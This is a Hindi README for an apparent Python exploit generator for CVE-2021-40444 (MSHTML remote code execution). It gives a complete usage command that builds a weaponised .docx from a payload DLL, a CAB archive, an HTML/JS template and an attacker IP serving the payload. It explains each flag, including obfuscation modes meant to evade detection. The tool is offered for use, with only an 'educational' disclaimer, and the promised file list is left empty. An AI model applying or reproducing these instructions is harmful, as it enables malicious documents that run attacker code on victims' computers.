
Python-आधारित एक्सप्लॉइट जनरेटर CVE-2021-40444 (MSHTML RCE) के लिए, टेम्पलेट-संचालित पेलोड डिलीवरी के साथ दुर्भावनापूर्ण Office दस्तावेज़ों, CAB संग्रहों और अस्पष्ट HTML/JS कॉलबैक के माध्यम से।
सुनिश्चित करें कि पहले setup.sh चलाएँ, क्योंकि आपको कुछ निर्देशिकाओं की आवश्यकता होगी। एक बार जब आप स्क्रिप्ट चला लेंगे, तो आप नीचे दिए गए उदाहरण के साथ gen.py चला सकेंगे:-
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3
# Flag
-d -> हमारी .docx फ़ाइल जिसे पहले से ही बिटमैप ऑब्जेक्ट के साथ संशोधित किया गया है, चाहे वह हेडर, दस्तावेज़ या फ़ुटर में हो
-i -> IP पता
-p -> पेलोड (.dll)
-t -> जावास्क्रिप्ट के साथ HTML फ़ाइल
-r -> संशोधित .docx के आउटपुट का नाम बदलें
-c -> पैच किए गए .cab के आउटपुट का नाम बदलें
-f -> .inf के आउटपुट का नाम बदलें
-obf -> अतिरिक्त: 3 मोड के साथ आता है (HTML Entity, UTF-16BE या दोनों)
-v -> आउटपुट वर्बोसिटी बढ़ाएँ
http.server का स्थान web निर्देशिका में होगा। इस निर्देशिका में 3 फ़ाइलें होंगी:-

यह रिपॉजिटरी केवल शैक्षिक उद्देश्य के लिए है और बुरे इरादे से वास्तविक दुनिया में उपयोग के लिए अभिप्रेत नहीं है। इस रिपॉजिटरी का कोई भी अवैध उपयोग पूरी तरह से आपकी अपनी जिम्मेदारी और जोखिम पर है।